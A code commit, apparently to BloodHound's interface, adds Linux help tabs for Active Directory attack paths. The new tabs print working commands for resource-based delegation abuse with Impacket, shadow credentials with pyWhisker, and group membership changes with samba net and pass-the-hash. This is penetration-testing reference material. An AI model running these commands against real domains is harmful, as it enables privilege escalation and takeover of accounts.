Adding abuse guidance from UNIX-like hosts

src/components/Modals/HelpTexts/AddAllowedToAct/AddAllowedToAct.jsx

@@ -2,7 +2,8 @@ import React from 'react';
 import PropTypes from 'prop-types';
 import { Tabs, Tab } from 'react-bootstrap';
 import General from './General';
-import Abuse from './Abuse';
+import WindowsAbuse from './WindowsAbuse';
+import LinuxAbuse from './LinuxAbuse';
 import Opsec from './Opsec';
 import References from './References';
 
@@ -21,13 +22,16 @@ const AddAllowedToAct = ({
                     targetName={targetName}
                 />
             </Tab>
-            <Tab eventKey={2} title='Abuse Info'>
-                <Abuse />
+            <Tab eventKey={2} title='Windows Abuse'>
+                <WindowsAbuse />
             </Tab>
-            <Tab eventKey={3} title='Opsec Considerations'>
+            <Tab eventKey={3} title='Linux Abuse'>
+                <LinuxAbuse />
+            </Tab>
+            <Tab eventKey={4} title='Opsec'>
                 <Opsec />
             </Tab>
-            <Tab eventKey={4} title='References'>
+            <Tab eventKey={5} title='Refs'>
                 <References />
             </Tab>
         </Tabs>

src/components/Modals/HelpTexts/AddAllowedToAct/LinuxAbuse.jsx

@@ -0,0 +1,42 @@
+import React from 'react';
+
+const LinuxAbuse = () => {
+    return (
+        <>
+            First, if an attacker does not control an account with an
+            SPN set, a new attacker-controlled computer account can be
+            added with Impacket's addcomputer.py example script:
+            <pre>
+                <code>
+                    {
+                        "addcomputer.py -method LDAPS -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host $DomainController -domain-netbios $DOMAIN 'domain/user:password'"
+                    }
+                </code>
+            </pre>
+            We now need to configure the target object so that the attacker-controlled
+            computer can delegate to it. Impacket's rbcd.py script can be used for that
+            purpose:
+            <pre>
+                <code>
+                    {
+                        "rbcd.py -delegate-from 'ATTACKERSYSTEM$' -delegate-to 'TargetComputer' -action 'write' 'domain/user:password'"
+                    }
+                </code>
+            </pre>
+            And finally we can get a service ticket for the service name (sname) we
+            want to "pretend" to be "admin" for. Impacket's getST.py example script
+            can be used for that purpose.
+            <pre>
+                <code>
+                    {
+                        "getST.py -spn 'cifs/targetcomputer.testlab.local' -impersonate 'admin' 'domain/attackersystem$:Summer2018!'"
+                    }
+                </code>
+            </pre>
+            This ticket can then be used with Pass-the-Ticket, and could grant access
+            to the file system of the TARGETCOMPUTER.
+        </>
+    );
+};
+
+export default LinuxAbuse;

src/components/Modals/HelpTexts/AddAllowedToAct/References.jsx

@@ -26,6 +26,14 @@ const References = () => {
             <a href='https://github.com/Kevin-Robertson/Powermad#new-machineaccount'>
                 https://github.com/Kevin-Robertson/Powermad#new-machineaccount
             </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd'>
+                https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd
+            </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/domain-settings/machineaccountquota'>
+                https://www.thehacker.recipes/ad/movement/domain-settings/machineaccountquota
+            </a>
         </>
     );
 };

src/components/Modals/HelpTexts/AddAllowedToAct/Abuse.jsx → src/components/Modals/HelpTexts/AddAllowedToAct/WindowsAbuse.jsx

@@ -1,6 +1,6 @@
 import React from 'react';
 
-const Abuse = () => {
+const WindowsAbuse = () => {
     return (
         <>
             Abusing this primitive is currently only possible through the Rubeus
@@ -62,4 +62,4 @@ const Abuse = () => {
     );
 };
 
-export default Abuse;
+export default WindowsAbuse;

src/components/Modals/HelpTexts/AddKeyCredentialLink/AddKeyCredentialLink.jsx

@@ -2,7 +2,8 @@ import React from 'react';
 import PropTypes from 'prop-types';
 import { Tabs, Tab } from 'react-bootstrap';
 import General from './General';
-import Abuse from './Abuse';
+import WindowsAbuse from './WindowsAbuse';
+import LinuxAbuse from './LinuxAbuse';
 import Opsec from './Opsec';
 import References from './References';
 
@@ -21,13 +22,16 @@ const AddKeyCredentialLink = ({
                     targetName={targetName}
                 />
             </Tab>
-            <Tab eventKey={2} title='Abuse Info'>
-                <Abuse sourceName={sourceName} sourceType={sourceType} />
+            <Tab eventKey={2} title='Windows Abuse'>
+                <WindowsAbuse sourceName={sourceName} sourceType={sourceType} />
             </Tab>
-            <Tab eventKey={3} title='Opsec Considerations'>
+            <Tab eventKey={3} title='Linux Abuse'>
+                <LinuxAbuse sourceName={sourceName} sourceType={sourceType} />
+            </Tab>
+            <Tab eventKey={4} title='Opsec'>
                 <Opsec />
             </Tab>
-            <Tab eventKey={4} title='References'>
+            <Tab eventKey={5} title='Refs'>
                 <References />
             </Tab>
         </Tabs>

src/components/Modals/HelpTexts/AddKeyCredentialLink/LinuxAbuse.jsx

@@ -0,0 +1,25 @@
+import React from 'react';
+import PropTypes from 'prop-types';
+
+const LinuxAbuse = ({ sourceName, sourceType }) => {
+    return (
+        <>
+            <p>To abuse this privilege, use <a href='https://github.com/ShutdownRepo/pywhisker'>pyWhisker</a>.</p>
+
+            <pre>
+                <code>{'pywhisker.py -d "domain.local" -u "controlledAccount" -p "somepassword" --target "targetAccount" --action "add"'}</code>
+            </pre>
+
+            <p>
+                For other optional parameters, view the pyWhisker documentation.
+            </p>
+        </>
+    );
+};
+
+LinuxAbuse.propTypes = {
+    sourceName: PropTypes.string,
+    sourceType: PropTypes.string,
+};
+
+export default LinuxAbuse;

src/components/Modals/HelpTexts/AddKeyCredentialLink/Abuse.jsx → src/components/Modals/HelpTexts/AddKeyCredentialLink/WindowsAbuse.jsx

@@ -1,7 +1,7 @@
 import React from 'react';
 import PropTypes from 'prop-types';
 
-const Abuse = ({ sourceName, sourceType }) => {
+const WindowsAbuse = ({ sourceName, sourceType }) => {
     return (
         <>
             <p>To abuse this privilege, use Whisker. </p>
@@ -18,15 +18,15 @@ const Abuse = ({ sourceName, sourceType }) => {
             </pre>
 
             <p>
-                For other optional parameters, view the Whisper documentation.
+                For other optional parameters, view the Whisker documentation.
             </p>
         </>
     );
 };
 
-Abuse.propTypes = {
+WindowsAbuse.propTypes = {
     sourceName: PropTypes.string,
     sourceType: PropTypes.string,
 };
 
-export default Abuse;
+export default WindowsAbuse;

src/components/Modals/HelpTexts/AddMember/AddMember.jsx

@@ -2,7 +2,8 @@ import React from 'react';
 import PropTypes from 'prop-types';
 import { Tabs, Tab } from 'react-bootstrap';
 import General from './General';
-import Abuse from './Abuse';
+import WindowsAbuse from './WindowsAbuse';
+import LinuxAbuse from './LinuxAbuse';
 import Opsec from './Opsec';
 import References from './References';
 
@@ -16,13 +17,16 @@ const AddMember = ({ sourceName, sourceType, targetName, targetType }) => {
                     targetName={targetName}
                 />
             </Tab>
-            <Tab eventKey={2} title='Abuse Info'>
-                <Abuse sourceName={sourceName} sourceType={sourceType} />
+            <Tab eventKey={2} title='Windows Abuse'>
+                <WindowsAbuse sourceName={sourceName} sourceType={sourceType} />
             </Tab>
-            <Tab eventKey={3} title='Opsec Considerations'>
+            <Tab eventKey={3} title='Linux Abuse'>
+                <LinuxAbuse sourceName={sourceName} sourceType={sourceType} />
+            </Tab>
+            <Tab eventKey={4} title='Opsec'>
                 <Opsec />
             </Tab>
-            <Tab eventKey={4} title='References'>
+            <Tab eventKey={5} title='Refs'>
                 <References />
             </Tab>
         </Tabs>

src/components/Modals/HelpTexts/AddMember/LinuxAbuse.jsx

@@ -0,0 +1,53 @@
+import React from 'react';
+import PropTypes from "prop-types";
+
+const LinuxAbuse = ({ sourceName, sourceType }) => {
+    return (
+        <>
+            <p>
+                Use samba's net tool to add the user to the target group. The credentials can be supplied in cleartext
+                or prompted interactively if omitted from the command line:
+            </p>
+
+            <pre>
+                <code>
+                    {
+                        'net rpc group addmem "TargetGroup" "TargetUser" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"'
+                    }
+                </code>
+            </pre>
+
+            <p>
+                Pass-the-hash can also be done here with <a href='https://github.com/byt3bl33d3r/pth-toolkit'>pth-toolkit's net tool</a>.
+                If the LM hash is not known it must be replace with <code>ffffffffffffffffffffffffffffffff</code>.
+            </p>
+
+            <pre>
+                <code>
+                    {
+                        'pth-net rpc group addmem "TargetGroup" "TargetUser" -U "DOMAIN"/"ControlledUser"%"LMhash":"NThash" -S "DomainController"'
+                    }
+                </code>
+            </pre>
+
+            <p>
+                Finally, verify that the user was successfully added to the group:
+            </p>
+
+            <pre>
+                <code>
+                    {
+                        'net rpc group members "TargetGroup" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"'
+                    }
+                </code>
+            </pre>
+        </>
+    );
+};
+
+LinuxAbuse.propTypes= {
+    sourceName: PropTypes.string,
+    sourceType: PropTypes.string
+}
+
+export default LinuxAbuse;

src/components/Modals/HelpTexts/AddMember/References.jsx

@@ -14,6 +14,10 @@ const References = () => {
             <a href='https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4728'>
                 https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4728
             </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/dacl/addmember'>
+                https://www.thehacker.recipes/ad/movement/dacl/addmember
+            </a>
         </>
     );
 };

src/components/Modals/HelpTexts/AddMember/Abuse.jsx → src/components/Modals/HelpTexts/AddMember/WindowsAbuse.jsx

@@ -1,7 +1,7 @@
 import React from 'react';
 import PropTypes from "prop-types";
 
-const Abuse = ({ sourceName, sourceType }) => {
+const WindowsAbuse = ({ sourceName, sourceType }) => {
     return (
         <>
             <p>
@@ -66,9 +66,9 @@ const Abuse = ({ sourceName, sourceType }) => {
     );
 };
 
-Abuse.propTypes= {
+WindowsAbuse.propTypes= {
     sourceName: PropTypes.string,
     sourceType: PropTypes.string
 }
 
-export default Abuse;
+export default WindowsAbuse;

src/components/Modals/HelpTexts/AddSelf/AddSelf.jsx

@@ -2,7 +2,8 @@ import React from 'react';
 import PropTypes from 'prop-types';
 import { Tabs, Tab } from 'react-bootstrap';
 import General from './General';
-import Abuse from './Abuse';
+import WindowsAbuse from './WindowsAbuse';
+import LinuxAbuse from './LinuxAbuse';
 import Opsec from './Opsec';
 import References from './References';
 
@@ -16,13 +17,16 @@ const AddSelf = ({ sourceName, sourceType, targetName, targetType }) => {
                     targetName={targetName}
                 />
             </Tab>
-            <Tab eventKey={2} title='Abuse Info'>
-                <Abuse sourceName={sourceName} sourceType={sourceType} />
+            <Tab eventKey={2} title='Windows Abuse'>
+                <WindowsAbuse sourceName={sourceName} sourceType={sourceType} />
             </Tab>
-            <Tab eventKey={3} title='Opsec Considerations'>
+            <Tab eventKey={3} title='Linux Abuse'>
+                <LinuxAbuse sourceName={sourceName} sourceType={sourceType} />
+            </Tab>
+            <Tab eventKey={4} title='Opsec'>
                 <Opsec />
             </Tab>
-            <Tab eventKey={4} title='References'>
+            <Tab eventKey={5} title='Refs'>
                 <References />
             </Tab>
         </Tabs>

src/components/Modals/HelpTexts/AddSelf/LinuxAbuse.jsx

@@ -0,0 +1,53 @@
+import React from 'react';
+import PropTypes from "prop-types";
+
+const LinuxAbuse = ({ sourceName, sourceType }) => {
+    return (
+        <>
+            <p>
+                Use samba's net tool to add the user to the target group. The credentials can be supplied in cleartext
+                or prompted interactively if omitted from the command line:
+            </p>
+
+            <pre>
+                <code>
+                    {
+                        'net rpc group addmem "TargetGroup" "TargetUser" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"'
+                    }
+                </code>
+            </pre>
+
+            <p>
+                Pass-the-hash can also be done here with <a href='https://github.com/byt3bl33d3r/pth-toolkit'>pth-toolkit's net tool</a>.
+                If the LM hash is not known it must be replace with <code>ffffffffffffffffffffffffffffffff</code>.
+            </p>
+
+            <pre>
+                <code>
+                    {
+                        'pth-net rpc group addmem "TargetGroup" "TargetUser" -U "DOMAIN"/"ControlledUser"%"LMhash":"NThash" -S "DomainController"'
+                    }
+                </code>
+            </pre>
+
+            <p>
+                Finally, verify that the user was successfully added to the group:
+            </p>
+
+            <pre>
+                <code>
+                    {
+                        'net rpc group members "TargetGroup" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"'
+                    }
+                </code>
+            </pre>
+        </>
+    );
+};
+
+LinuxAbuse.propTypes= {
+    sourceName: PropTypes.string,
+    sourceType: PropTypes.string
+}
+
+export default LinuxAbuse;